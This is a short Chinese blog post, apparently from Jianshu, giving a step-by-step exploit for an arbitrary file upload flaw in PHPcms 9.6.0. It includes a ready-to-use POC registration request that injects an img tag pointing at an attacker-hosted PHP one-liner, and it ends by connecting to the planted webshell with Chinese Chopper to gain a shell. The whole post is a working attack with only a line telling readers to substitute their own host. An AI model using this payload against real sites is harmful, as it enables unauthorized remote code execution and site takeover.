PHPcms9.6.0 最新版任意文件上传漏洞

1、首先我们在本地搭建一个php环境,我这里是appserv(只要可以执行php文件就行),在根目录下新建一个txt文本文件里面写上php一句话,如上图可以访问

图片.png

2、接着我们找到phpcms网站注册模块,随便填一下信息

图片.png

3、然后我们用burpsuite抓包

图片.png

然后发送到repeater

图片.png

我们在最下面的注册那儿使用img标签插入我们本地第一步搭建的一句话

提交的poc

siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=http://192.168.1.105/1.txt?.php#.jpg>&dosubmit=1&protocol=

只需要修改img里面的链接为你本地写入的一句话即可

我们可以看到repeater里MYSQL query成功插入,接着访问上图repeater里我标黄语句,执行一句话连接菜刀,getshell

图片.png
图片.png
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容